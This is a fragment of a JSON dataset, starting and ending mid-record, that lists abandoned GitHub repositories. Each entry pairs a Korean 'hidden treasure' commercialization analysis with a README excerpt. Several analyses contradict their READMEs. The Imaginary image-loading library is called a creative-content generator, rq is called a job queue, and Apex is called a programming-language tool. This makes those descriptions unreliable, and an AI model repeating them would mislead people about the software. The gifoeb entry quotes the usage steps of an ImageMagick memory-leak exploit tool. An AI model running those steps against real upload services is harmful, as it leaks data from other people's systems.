react-native-","composite_score":0.3027,"license_safety_tag":"safe"},{"name":"hyperoslo/Imaginary","github_url":"https://github.com/hyperoslo/Imaginary","stars":6,"language":"Swift","license":"NOASSERTION","abandonment_months":48,"description":"# Imaginary 저장소 분석\n\n## 왜 보물인가\n상상력이 필요한 작업을 자동으로 처리해주는 도구로, 창의적인 콘텐츠 제작 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 마케팅 팀이 광고 카피나 상품 설명을 자동 생성하는 콘텐츠 제작 플랫폼\n- **내부 업무 도구**: 기업의 PR팀이 보도자료나 뉴스레터 ","readme_excerpt":"# Imaginary\n\n[![CI Status](https://circleci.com/gh/hyperoslo/Imaginary.png)](https://circleci.com/gh/hyperoslo/Imaginary)\n[![Version](https://img.shields.io/cocoapods/v/Imaginary.svg?style=flat)](http://cocoadocs.org/docsets/Imaginary)\n[![License](https://img.shields.io/cocoapods/l/Imaginary.svg?style=flat)](http://cocoadocs.org/docsets/Imaginary)\n[![Platform](https://img.shields.io/cocoapods/p/Imaginary.svg?style=flat)](http://cocoadocs.org/docsets/Imaginary)\n![Swift](https://img.shields.io/badge/%20in-swift%204.0-orange.svg)\n\n<img src=\"https://raw.githubusercontent.com/hyperoslo/Imaginary/master/Images/icon.png\" alt=\"Brick Icon\" align=\"right\" />\n\n## Table of Contents\n\n- [Description](#description)\n- [Usage](#usage)\n  - [Basic](#basic)\n  - [Advanced](#advanced)\n  - [Configuration](#configuration)\n  - [ImageFetcher](#imagefetcher)\n- [Installation](#installation)\n\n## Description\n\nUsing remote images in an application is more or less a requirement these days.\nThis process should be easy,","composite_score":0.3027,"license_safety_tag":"unknown"},{"name":"xuningjack/ProcessKeep","github_url":"https://github.com/xuningjack/ProcessKeep","stars":6,"language":"Java","license":"unknown","abandonment_months":103,"description":"# ProcessKeep 상업화 분석\n\n## 왜 보물인가\n컴퓨터에서 실행 중인 프로그램들을 자동으로 관리하고 모니터링하는 도구로, 기업의 운영 효율성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 서버 모니터링 플랫폼으로 제공하여 기업들이 자신의 시스템 상태를 실시간으로 확인\n- **내부 업무 도구**: 금융사·","readme_excerpt":"# ProcessKeep\nTwo Services are keeping each other alive. You can use this project. (使用双进程守护来实现2个Service的保活，2个进程相互监听。通过AIDL实现。)  \nOperating steps are shown below:  \n![Alt text](https://github.com/xuningjack/ProcessKeep/raw/master/app/images/1.jpg)  \n![Alt text](https://github.com/xuningjack/ProcessKeep/raw/master/app/images/2.jpg)  \n![Alt text](https://github.com/xuningjack/ProcessKeep/raw/master/app/images/3.jpg)  \n\n","composite_score":0.3027,"license_safety_tag":"unknown"},{"name":"acgotaku/BaiduExporter","github_url":"https://github.com/acgotaku/BaiduExporter","stars":7,"language":"","license":"unknown","abandonment_months":65,"description":"# BaiduExporter 사업화 분석\n\n## 왜 보물인가\n바이두(중국 최대 검색엔진)에서 대량의 파일이나 데이터를 한 번에 내려받을 수 있게 해주는 도구로, 중국 시장에서 자동화 업무가 필요한 기업들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중국 기업 대상 \"바이두 자동 다운로드 클라우드 서비스\" - 월 구독제로 대량 파일","readme_excerpt":"Removed.\n","composite_score":0.3027,"license_safety_tag":"unknown"},{"name":"pgorczak/srslte-docker-emulated","github_url":"https://github.com/pgorczak/srslte-docker-emulated","stars":60,"language":"Dockerfile","license":"unknown","abandonment_months":76,"description":"# srslte-docker-emulated 분석\n\n## 왜 보물인가\n복잡한 통신 시스템을 컴퓨터에서 간단히 테스트할 수 있게 만들어놓은 도구라서, 5G나 통신 기술을 개발하는 회사들의 개발 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 통신사/장비 제조사를 위한 클라우드 기반 5G 네트워크 시뮬레이션 플랫폼 (구","readme_excerpt":"# srslte-docker-emulated\n\nThis is a minimal example of an end-to-end [srsLTE] system running with Docker\nand shared memory. Core network, base station and user device all run in\nseparate containers. The air interface is emulated via radio samples in shared\nmemory.\n\nSee it happen with\n\n    docker-compose up\n\nAfter a while you'll se the UE attach:\n\n    virtual-srsue | Network attach successful. IP: 172.16.0.2\n    virtual-srsenb | User 0x46 connected\n\nNow you can test the connection in a new terminal:\n\n    docker exec -i -t virtual-srsepc ping 172.16.0.2\n    PING 172.16.0.2 (172.16.0.2) 56(84) bytes of data.\n    64 bytes from 172.16.0.2: icmp_seq=1 ttl=64 time=25.3 ms\n    64 bytes from 172.16.0.2: icmp_seq=2 ttl=64 time=24.2 ms\n\n*Credits go to [jgiovatto] for implementing the shared memory radio interfaces\nand to [FabianEckermann] for figuring out how to integrate it with Docker's IPC\nfunctionality.*\n\n[srsLTE]: https://github.com/srsLTE/srsLTE\n[jgiovatto]: https://github.com/jgiovatto\n[Fa","composite_score":0.3027,"license_safety_tag":"unknown"},{"name":"fashiontec/bodyapps-viz","github_url":"https://github.com/fashiontec/bodyapps-viz","stars":12,"language":"JavaScript","license":"lgpl-3.0","abandonment_months":45,"description":"# fashiontec/bodyapps-viz 상용화 분석\n\n## 왜 보물인가\n실제 사람의 몸 치수를 3D로 시각화하여 옷 쇼핑 경험을 완전히 바꿀 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 의류 쇼핑몰**: 고객이 구매 전에 자신의 체형에 맞는 옷이 어떻게 보일지 가상으로 확인할 수 있는 서비스\n2. **패션 브랜드 내부 도구**: ","readme_excerpt":"[![Build Status](https://travis-ci.org/fossasia/bodyapps-viz.svg?branch=master)](https://travis-ci.org/fossasia/bodyapps-viz)\n[![Join the chat at https://gitter.im/fossasia/bodyapps-android](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/bodyapps?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n# BodyApps 3D Body Visualiser\n\n3D body visualizer component for #bodyapps project\n\n## About \nThe Body Visualiser App is an attempt to create a web based 3D Human body visualiser with options to import body measurements , using Fashiontec’s BodyApps Web Service and model the human body using the slider functions.\n\nThe App supports the models for a Male , Female and a gender neutral Kids Body with options to modify following body measurements and features.\n\n* Height\n* Chest/Breast\n* Neck Girth\n* Neck Height \n* Shoulders\n* Shoulder’s Slope\n* Bust Girth\n* Stomach Form\n* Waist\n* Arm Length\n* Upper Arm Girth\n* Wrist\n* Hip Girth\n* Hip Height\n* Thigh Gir","composite_score":0.3026,"license_safety_tag":"restricted"},{"name":"diez/diez","github_url":"https://github.com/diez/diez","stars":5,"language":"TypeScript","license":"NOASSERTION","abandonment_months":42,"description":"# Diez 저장소 분석\n\n## 왜 보물인가\n디자이너와 개발자가 같은 디자인 언어를 공유하며 협업할 수 있도록 해주는 자동화 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디자인 시스템 관리 플랫폼으로 대규모 팀의 색상, 폰트, 간격 정보를 중앙에서 관리하고 일괄 배포\n2. **내부 업무 도구**: 대기업의 여러 부서에서 만드는 앱들","readme_excerpt":"# Diez &middot; [![Build Status](https://travis-ci.com/diez/diez.svg?token=YuETDnVqzQjQytETzD8J&branch=master)](https://travis-ci.com/diez/diez) [![codecov](https://codecov.io/gh/diez/diez/branch/master/graph/badge.svg?token=pgB9U8YLUU)](https://codecov.io/gh/diez/diez)\n\n## The Design Token Framework\n\nDiez is an open-source developer toolkit for building & maintaining [design tokens](https://diez.org/glossary/#tokens) at scale.\n\nWrite & maintain styles in one place, then compile & consume them everywhere:  Diez supports any UI component library or codebase written in Swift, Objective-C, Kotlin, Java, TypeScript, JavaScript/JSON, CSS, or SCSS.\n\nDiez reduces the cost of delivering a consistent visual identity across your company's apps & websites.\n\n\n## What's in the box?\n\nDiez's toolkit comes in four parts:\n\n - **[Compiler](https://github.com/diez/diez/tree/master/src/compiler)** — Diez includes a novel open-source compiler that converts (transpiles) TypeScript tokens into native package","composite_score":0.3026,"license_safety_tag":"unknown"},{"name":"yacy/yacy_webclient_bootstrap","github_url":"https://github.com/yacy/yacy_webclient_bootstrap","stars":11,"language":"HTML","license":"NOASSERTION","abandonment_months":52,"description":"# YaCy 웹클라이언트 부트스트랩 평가\n\n## 왜 보물인가\n검색 엔진을 직접 만들고 관리할 수 있는 오픈소스 도구로, 대형 검색 서비스에 의존하지 않고 독립적인 검색 시스템을 구축하려는 조직에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 내부 문서 검색 SaaS**\n대기업의 보안 문서, 회의록, 프로젝트 자료를 직원들이 빠르게 찾을 수 ","readme_excerpt":"# yacy_webclient_bootstrap\nThis is a YaCy Search Client using Bootstrap which can be used as a template for your own search portal!\n\nThis can be hosted on github pages. Here is the example link to this repository:\nhttp://yacy.github.io/yacy_webclient_bootstrap/\n\nThe search result from the default cofiguration is retrieved either from http://search.yacy.net (the demo portal of YaCy)\nif you open the web pages from a http-hosted location like github pages) or the search results are retrieved from your\nlocal YaCy installation at ```http://localhost:8090``` if you open the pages from a ```file://```-path.\n\nTo run your own search portal with your own search index, just change the ```server``` setting in ```js/setup.js```.\n\nTo download the YaCy search server, go to http://yacy.net\n\n","composite_score":0.3026,"license_safety_tag":"unknown"},{"name":"zhpanvip/Retrofit2","github_url":"https://github.com/zhpanvip/Retrofit2","stars":6,"language":"Java","license":"unknown","abandonment_months":66,"description":"# Retrofit2 저장소 분석\n\n## 왜 보물인가\n모바일 앱과 웹서비스를 연결해주는 '통신 도구'로, 개발자들이 복잡한 데이터 전송 작업을 간단하게 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **모바일 앱 개발 회사**: 스마트폰 앱이 서버와 데이터를 주고받을 때 이 도구를 이용해 개발 시간을 40% 단축\n- **API 판매 플랫폼**: ","readme_excerpt":"# Retrofit2\n\n该项目针对如下json数据格式进行封装\n\n```json\n{\n  \"code\": 200,\n  \"message\": \"成功\",\n  \"results\": {\n    ...\n   }\n}\n```\n\n\n## 一、使用方法：\n\n### 1.Post请求\n\n```java\nRetrofitHelper.getApiService()\n                .login(getParameters())\n                .compose(RxUtil.rxSchedulerHelper(this, true))\n                .subscribe(new ResponseObserver<LoginResponse>() {\n                    @Override\n                    public void onSuccess(LoginResponse response) {\n                        showToast(\"登录成功\");\n                    }\n\n                    @Override\n                    public void onFail(String message) {\n                        super.onFail(message);\n                        \n                    }\n                });\n\n```\n\n### 2.Get请求\n\n```java\n\n    public void getData(View view) {\n        RetrofitHelper.getApiService()\n                .getArticle()\n                .compose(RxUtil.rxSchedulerHelper(this, true))\n                .subscribe(new ResponseObserver<ArticleWrapper>() {\n                    @","composite_score":0.3026,"license_safety_tag":"unknown"},{"name":"sebastianbergmann/php-token-stream","github_url":"https://github.com/sebastianbergmann/php-token-stream","stars":9,"language":"PHP","license":"NOASSERTION","abandonment_months":59,"description":"# PHP Token Stream 상용화 분석\n\n## 왜 보물인가\n프로그래밍 언어를 분석하고 이해하는 기술을 제공하므로, 코드 품질 검사·자동 문서화·보안 취약점 탐지 등 다양한 개발자 도구의 핵심 엔진으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 개발팀이 코드 품질을 자동으로 검사해주는 온라인 플랫폼 (월 구독","readme_excerpt":"# phpunit/php-token-stream\n\n[![CI Status](https://github.com/sebastianbergmann/php-token-stream/workflows/CI/badge.svg)](https://github.com/sebastianbergmann/php-token-stream/actions)\n[![Type Coverage](https://shepherd.dev/github/sebastianbergmann/php-token-stream/coverage.svg)](https://shepherd.dev/github/sebastianbergmann/php-token-stream)\n\n## Installation\n\nYou can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/):\n\n```\ncomposer require phpunit/php-token-stream\n```\n\nIf you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency:\n\n```\ncomposer require --dev phpunit/php-token-stream\n```\n","composite_score":0.3026,"license_safety_tag":"unknown"},{"name":"dflemstr/rq","github_url":"https://github.com/dflemstr/rq","stars":5,"language":"Rust","license":"apache-2.0","abandonment_months":30,"description":"# dflemstr/rq 분석 보고서\n\n## 왜 보물인가\n작업 대기열을 효율적으로 관리하는 도구로, 여러 작업을 한 번에 처리해야 하는 기업들의 업무 속도를 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이메일 대량 발송 서비스에서 수천 개의 이메일을 순차적으로 처리하고 실패한 항목을 자동 재시도\n- **내부 업무 도구","readme_excerpt":"# `rq` [![Build Status](https://travis-ci.org/dflemstr/rq.svg?branch=master)](https://travis-ci.org/dflemstr/rq) [![Build status](https://ci.appveyor.com/api/projects/status/aq916pu1odthadeh?svg=true)](https://ci.appveyor.com/project/dflemstr/rq) [![Crates.io](https://img.shields.io/crates/v/record-query.svg)](https://crates.io/crates/record-query) [![Language (Rust)](https://img.shields.io/badge/powered_by-Rust-blue.svg)](http://www.rust-lang.org/)\n**NOTE**: `rq` is in very low maintenance mode as my day job is taking up\na lot of my time.  I will try my best to merge pull requests but will\nnot drive active development of this crate.\n\n**NOTE**: `rq` no longer ships with query support and a Javascript\nengine is not included; instead, it focuses exclusively on format\ntransformation.  You can still pipe into a runtime like node.js if\nyou need Javascript evaluation.  Please see [this issue](https://github.com/dflemstr/rq/issues/208)\nto discuss introducing a new query language.\n\nThis is the","composite_score":0.3025,"license_safety_tag":"safe"},{"name":"neex/gifoeb","github_url":"https://github.com/neex/gifoeb","stars":5,"language":"Python","license":"unknown","abandonment_months":108,"description":"# neex/gifoeb 프로젝트 분석\n\n## 왜 보물인가\n정확한 프로젝트 설명이 없어 가치 판단이 어렵지만, 낮은 스타 수(5개)와 오래된 마지막 업데이트(2017년)로 보아 초기 단계 또는 틈새 시장의 숨겨진 도구일 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 프로젝트명 'gifoeb'의 정체가 명확해지면 특정 기업의 반","readme_excerpt":"### Summary\n\nImageMagick/GraphicsMagick's gif parser before https://github.com/ImageMagick/ImageMagick/commit/9fd10cf630832b36a588c1545d8736539b2f1fb5 leaves the palette uninitialized if neither global nor local palette is present. If IM/GM is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.\n\n### How to use\n\n1. Run `./gifoeb gen 512x512 dump.gif`. The script needs ImageMagick (default) or GraphicsMagick (use `--tool GM`) to generate the images.\n2. Upload `dump.gif` somewhere. If the following conditions hold true\n   1. A preview is generated\n   2. It is preferably not a JPEG (see notes)\n   3. It changes significantly from one upload to another\n\n   then you're lucky.\n3. Download and save the preview as `preview.ext`.\n4. ```bash\n   r=$(identify -format '%wx%h' preview.ext[0]) &&\n   mkdir -p for_upload &&\n   for i in `seq 1 10`; do\n      ./gifoeb gen $r for_upload/$i.gif;\n   done\n   ```\n5. Upload `f","composite_score":0.3025,"license_safety_tag":"unknown"},{"name":"felixweyne/ProcessSpawnControl","github_url":"https://github.com/felixweyne/ProcessSpawnControl","stars":8,"language":"PowerShell","license":"unknown","abandonment_months":53,"description":"# ProcessSpawnControl 분석\n\n## 왜 보물인가\n컴퓨터에서 실행되는 프로그램들을 세밀하게 통제하고 모니터링할 수 있는 기술로, 보안이 중요한 기업들이 필요로 하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 관리 SaaS**: 직원 컴퓨터에서 실행되는 프로그램을 중앙에서 모니터링하고 제한하는 클라우드 서비스\n2. **내","readme_excerpt":"# Process Spawn Control  \n\n_author:_ Felix Weyne ([website](https://www.uperesia.com)) ([Twitter](https://twitter.com/felixw3000))  \n\nProcess Spawn Control is a Powershell tool which aims to help in the behavioral (process) analysis of malware.  \nProcess Spawn Control suspends newly launched processes and gives the analyst the option to either keep the process suspended or to resume it, allowing the process to run.\n\nBy using this tool, an analyst can slow down the execution chain and let a malware dropper drop the payload without giving it the ability to execute it. Additionally, this tool can be used to help in the analysis of malware which injects itself into a newly spawned process.  \n\n![Process Spawn Control](media/process_spawn_control.jpg?raw=true)\n\n### Technical details\nProcess Spawn Control (PsC) uses _Windows Management Instrumentation (WMI)_ to asynchronously get events about newly started processes. If the process is not configured \nto be ignored, PsC will try to suspend the","composite_score":0.3024,"license_safety_tag":"unknown"},{"name":"fossasia/events.fossasia.org","github_url":"https://github.com/fossasia/events.fossasia.org","stars":12,"language":"Less","license":"unknown","abandonment_months":39,"description":"# fossasia/events.fossasia.org 분석 보고서\n\n## 왜 보물인가\n전 세계 기술 행사와 컨퍼런스를 한곳에서 관리하고 홍보할 수 있는 중앙 플랫폼으로, 행사 주최자들의 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 행사 관리 SaaS 서비스**\n개발자 컨퍼런스, 해커톤, 기술 워크숍 등을 운영하는 단체들을 ","readme_excerpt":"# events.fossasia.org\nOverview Page of FOSSASIA Meetups and Events\n\nThe site for this repository is at https://events.fossasia.org\n\n","composite_score":0.3024,"license_safety_tag":"unknown"},{"name":"apex/apex","github_url":"https://github.com/apex/apex","stars":6,"language":"Go","license":"mit","abandonment_months":70,"description":"# apex/apex 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어나 개발 도구를 만드는 프로젝트로, 기술 개발자들이 더 쉽게 소프트웨어를 만들 수 있도록 돕는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **개발 도구 SaaS**: 소프트웨어 개발자들을 위한 온라인 개발 환경으로 구독료 수집\n2. **기업 내부 도구**: 대기업의 개발팀이 자신들의","readme_excerpt":"\n# No longer maintained\n\nThis software is no longer being maintainted and should not be chosen for new projects. See this [issue](https://github.com/apex/apex/issues/932) for more information\n\n![Apex Serverless Architecture](assets/title.png)\n\nApex lets you build, deploy, and manage [AWS Lambda](https://aws.amazon.com/lambda/) functions with ease. With Apex you can use languages that are not natively supported by AWS Lambda through the use of a Node.js shim injected into the build. A variety of workflow related tooling is provided for testing functions, rolling back deploys, viewing metrics, tailing logs, hooking into the build system and more.\n\nThis project is designed for event-driven pipelines as it does not abstract away FaaS (functions as a service). If you are building web applications, APIs, or sites, consider using [Apex Up](https://github.com/apex/up), which provides a more out-of-the-box experience for these use-cases.\n\n## Installation\n\nOn macOS, Linux, or OpenBSD run the fol","composite_score":0.3024,"license_safety_tag":"safe"},{"name":"facebookresearch/DeepFovea","github_url":"https://github.com/facebookresearch/DeepFovea","stars":12,"language":"PureBasic","license":"NOASSERTION","abandonment_months":58,"description":"# DeepFovea 상용화 분석\n\n## 왜 보물인가\n페이스북 연구팀이 만든 이 기술은 영상을 더 빠르게 처리하면서도 화질을 유지하는 방식으로, VR·게임·실시간 영상 서비스의 성능을 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 비디오 스트리밍 플랫폼(유튜브, 넷플릭스 같은 서비스)에서 데이터 사용량","readme_excerpt":"# DeepFovea\n\n<p align='center'>\n  <img src='img/teaser.png' width='1000'/>\n</p>\n\nThis repository provides the materials related to the DeepFovea project from Facebook Reality Labs. DeepFovea is a network for a foveated rendering that allows to reconstruct a plausible perifery with a small amount of pixels.\n\nIf you use any materials from this repository, please cite the publication: Anton Kaplanyan, Anton Sochenov, Thomas Leimkuehler, Mikhail Okunev, Todd Goodall, Gizem Rufo, \"DeepFovea: Neural Reconstruction for Foveated Rendering and Video Compression using Learned Statistics of Natural Videos\", SIGGRAPH Asia 2019.\n\n```input_graph.pb``` file contains the network graph for both generator and discriminator.\n\n# Model\n## Generator\n\nGenerator model is a U-Net with recurrent decoder blocks. The naming convention is ```glEnc_XtoY``` for encoder blocks and ```glDec_YtoX``` for the corresponding decoder blocks, where X and Y change with the depth. The network is trained on 128x128 videos.\n\n<p ","composite_score":0.3024,"license_safety_tag":"unknown"},{"name":"r26zhao/django-easy-comment","github_url":"https://github.com/r26zhao/django-easy-comment","stars":7,"language":"Python","license":"mit","abandonment_months":96,"description":"# django-easy-comment 상업화 분석\n\n## 왜 보물인가\n웹사이트에 댓글 기능을 쉽게 추가할 수 있는 도구로, 복잡한 개발 없이 사용자 상호작용 기능을 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **블로그/뉴스 SaaS 플랫폼**: 개인 블로거나 언론사가 자신의 사이트에 댓글 시스템을 빠르게 설치하는 서비스\n2. **커뮤니티 사이트","readme_excerpt":"与之前的版本相比主要的差别是现在评论使用ajax异步加载、支持评论分页（下拉无限加载），无须再绑定模型，可以评论任何对象（也可以是空的），目前采用的一级评论，按时间倒序，但是评论模型依旧继承了MPTTModel来记录层级顺序，未来会加入二级评论和多层级评论的模板供大家选择。\n\n## 项目地址\n\n[https://github.com/r26zhao/django-easy-comment](https://github.com/r26zhao/django-easy-comment)  如果觉得对你有所帮助的话，请给个star (◕ᴗ◕✿)\n开发环境：py3.6、Django1.11\n\n目前没有在py2.7测试过，但根据使用py2.7的小伙伴反应，会报出编码错误，由easy_comment/handlers.py 文件里的中文引起的，把里面的中文处理一下即可解决。\n## 安装\n\n1.从github把`easy_comment`、`online_status`和`requirements`拉取到本地项目\n\n2.安装依赖包\n\n `pip install -r requirements/requirements.txt`\n\n3.在settings.py里把上面安装的app加入到`INSTALLED_APPS`中\n```\nINSTALLED_APPS = [\n    'ckeditor',\n    'ckeditor_uploader',\n    'mptt',\n    'easy_comment',\n    'notifications',\n    'online_status',\n]\n```\n添加ckeditor相关设置，使编辑器可以添加代码块，上传图片\n```\n#ckeditor setup\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '/media/'\nCKEDITOR_UPLOAD_PATH = 'upload/'\nCKEDITOR_IMAGE_BACKEND = 'pillow'\nCKEDITOR_CONFIGS = {\n    'default': {\n        'width':'auto',\n        'height':'150px',\n        'image_previ","composite_score":0.3024,"license_safety_tag":"safe"},{"name":"git-time-metric/gtm","github_url":"https://github.com/git-time-metric/gtm","stars":5,"language":"Go","license":"mit","abandonment_months":53,"description":"# GTM (Git Time Metric) 보물 지도\n\n## 왜 보물인가\n직원들이 실제로 일한 시간을 깃허브 코드 변화로 자동 추적하므로, 번거로운 수동 시간 기록을 완전히 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프리랜서 플랫폼에서 개발자의 작업 시간을 자동으로 기록하고 비용을 청구하는 서비스\n2. **내부 업무 도구*","readme_excerpt":"<div align=\"center\"><img src=\"https://cloud.githubusercontent.com/assets/630550/19619834/43c460dc-9835-11e6-8652-1c8fff91cf02.png\" alt=\"GTM Logo\" height=\"115\" width=\"275\"></div>\n<div align=\"center\"><font size=16><bold>Git Time Metric</bold></font></div>\n\n### Seamless time tracking for all your Git projects\n\n##### $ gtm report -last-month\n<div><img src=\"https://cloud.githubusercontent.com/assets/630550/21582250/8a03f9dc-d015-11e6-8f77-548ef7314bf7.png\"></div>\n\n##### $ gtm report -last-month -format summary\n<div><img src=\"https://cloud.githubusercontent.com/assets/630550/21582252/8f85b738-d015-11e6-8c70-beed7e7b3254.png\"></div>\n\n##### $ gtm report -last-month -format timeline-hours\n<div><img src=\"https://cloud.githubusercontent.com/assets/630550/21582253/91f6226e-d015-11e6-897c-6042111e6a6a.png\"></div> </br>\n\nGTM is automatic, seamless and lightweight.  There is no need to remember to start and stop timers.  It runs on occasion to capture activity triggered by your editor.  The time metr","composite_score":0.3023,"license_safety_tag":"safe"},{"name":"appear/reactjs-interview-questions-ko","github_url":"https://github.com/appear/reactjs-interview-questions-ko","stars":7,"language":"","license":"unknown","abandonment_months":66,"description":"# reactjs-interview-questions-ko 분석\n\n## 왜 보물인가\n리액트라는 웹 개발 기술에 대해 면접에서 물어볼 만한 질문과 답변을 모아둔 한국어 학습 자료로, 개발자 채용 준비를 하는 수만 명의 구직자들이 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 SaaS**: 개발 학원이나 온라인 코딩 교육 플랫폼이 이 질문 모","readme_excerpt":"# reactjs-interview-questions-ko ✨\n\n<br />\n\n> 원작자인 [sudheerj](https://github.com/sudheerj) 의 동의를 구하고 진행하는 번역본 입니다.\n영어 원본은 [링크](https://github.com/sudheerj/reactjs-interview-questions#what-is-reactjs) 에서 확인 할 수 있습니다.\n\n도움을 주시고싶은 분들은 fork 후 pull request 부탁드립니다 🎉\n이 글이 도움이 되셨다면 ⭐ 를 눌러주세요 \n\n<br />\n\n## 목차\n\n---\n\n| No. | Questions |\n| --- | --------- |\n|   | **Core React** |\n|1  | [What is React?](#what-is-react) |\n|2  | [What are the major features of React?](#what-are-the-major-features-of-react) |\n|3  | [What is JSX?](#what-is-jsx) |\n|4  | [What is the difference between Element and Component?](#what-is-the-difference-between-element-and-component) |\n|5  | [How to create components in React?](#how-to-create-components-in-react) |\n|6  | [When to use a Class Component over a Function Component?](#when-to-use-a-class-component-over-a-function-component) |\n|7  | [What are Pure Components?](#what-are-pure-components) |\n|8  | [What is state in React?](#what-is-state-in-react) |\n|9  | [What are pro","composite_score":0.3023,"license_safety_tag":"unknown"},{"name":"nvincenthill/Improve-Your-Workflow","github_url":"https://github.com/nvincenthill/Improve-Your-Workflow","stars":19,"language":"","license":"unknown","abandonment_months":90,"description":"# nvincenthill/Improve-Your-Workflow 분석\n\n## 왜 보물인가\n업무 효율을 높이기 위한 실용적인 방법들을 모아놓은 저장소로, 누구나 따라 할 수 있는 구체적인 팁과 도구를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **업무 관리 SaaS**: 개인과 팀의 생산성을 높이는 웹 애플리케이션으로 판매\n2. **기업 교육 프로그램**","readme_excerpt":"# Improve your development workflow\n\n> This is a non-exhaustive guide to improving the ease, speed, and productivity of your development.\n\n![Improve your productivity](http://comics.roderickmann.org/episodes/Dilbert/2015/05/Dilbert20150506.gif)\n\n## Table of Contents\n\n1.  [Introduction - Master the Basics](https://github.com/nvincenthill/streamlineyourworkflow/tree/master/Part%201/PART1.md)\n1.  [Become a VSCode Power User](https://github.com/nvincenthill/streamlineyourworkflow/tree/master/Part%202/PART2.md)\n1.  [Code Faster/Better/Stronger at Hack Reactor](https://github.com/nvincenthill/streamlineyourworkflow/tree/master/Part%203/PART3.md)\n1.  [Conclusion - Implement Change with Deliberate Practice](https://github.com/nvincenthill/streamlineyourworkflow/tree/master/Part%204/PART4.md)\n\n## Usage\n\nJust follow the guide and enjoy the amazing quality of life improvements\n\n## Contribute\n\nWant to add something to this guide? Did I mess up something or has something changed? Want your copyrigh","composite_score":0.3023,"license_safety_tag":"unknown"},{"name":"zgs225/alfred-youdao","github_url":"https://github.com/zgs225/alfred-youdao","stars":18,"language":"Go","license":"unknown","abandonment_months":65,"description":"# alfred-youdao 상용화 분석\n\n## 왜 보물인가\n영어 단어를 빠르게 찾아주는 영한 사전 도구로, 글쓰기나 번역 작업 중 즉시 단어 뜻을 확인하려는 수많은 사용자들의 일상적 필요를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 영어 학습자를 위한 구독형 단어 검색 앱 (추천 단어, 학습 통계 등 추가 기능)\n2. **내부 ","readme_excerpt":"Alfred-Youdao\n===\n\nYoudao Dict for Alfred.    \n\n![预览](./assets/demo.gif)\n\n设置有道API演示\n\n![预览](./assets/demo-api.gif)\n\n## Features\n\n+ 使用方法 `yd {query}`\n+ 支持屏幕取词功能, 需要先在Alfred Workflow中设置热键\n+ 使用`Shift+Enter`在有道词典网页中打开\n+ 使用`Cmd+Enter`发音\n+ 按`Enter`键复制翻译结果\n+ 支持设置源语言和目标语言，支持中文、日语、英语等相互翻译。语法是`yd zh=>ja 我爱你`\n\n支持相互翻译的语言列表如下:\n\n+ `zh`     - 中文\n+ `ja`     - 日文\n+ `en`     - 英文\n+ `ko`     - 韩文\n+ `fr`     - 法文\n+ `ru`     - 俄文\n+ `pt`     - 葡萄牙文\n+ `es`     - 西班牙文\n+ `auto`   - 自动\n\n## Dependencies\n\n+ Go 1.6\n\n## TODO\n\n+ [x] 一个好的自动更新机制\n+ [x] 添加语音\n+ [x] 自定义有道API Key 和 Secret\n+ [ ] 拼写提示功能\n\n## CHANGELOG\n\n### 1.5.2\n\n+ 自定义有道API Key 和 Secret\n\n### 1.5.1\n\n+ 发音添加了对日语、法语等语言的支持\n+ 修改中文语言选项\n\n### 1.5.0\n\n+ 添加发音功能，调用Mac自带的发音软件\n+ 优化了打开词典的网页\n+ 其他小修改\n\n### 1.4.0\n\n+ 添加手动设置翻译语言\n+ 修改结果展示，让展示的结果更全面\n\n### 1.3.2\n\n+ 修复缓存失效问题\n+ 移除没有什么用处的自动更新\n\n### 1.3.0\n\n+ 添加在后台自动更新的机制\n\n### 1.2.4\n\n+ 修改Alfred执行队列行为，让查询更平滑\n\n### 1.2.3\n\n+ 添加按`Shift+Enter`键在有道网站打开功能\n\n### 1.2.2\n\n+ 添加按Enter键复制功能\n+ 可以在Workflows里面设置快捷键实现屏幕取词功能\n\n### 1.2.1\n\n+ 延长缓存时间\n+ 延长查询超时时间\n\n### ","composite_score":0.3023,"license_safety_tag":"unknown"},{"name":"npm/tink","github_url":"https://github.com/npm/tink","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":61,"description":"# npm/tink 프로젝트 분석\n\n## 왜 보물인가\nnpm(자바스크립트 패키지 관리 도구)의 보안을 강화하고 의존성 관리를 자동화하는 솔루션으로, 소프트웨어 개발팀의 보안 리스크를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스**: 개발사들이 자신의 프로젝트 보안을 자동으로 검사받을 수 있는 클라우드 기반 감시 서비스\n\n**","readme_excerpt":"# tink [![npm](https://img.shields.io/npm/v/tink.svg)](https://npm.im/tink) 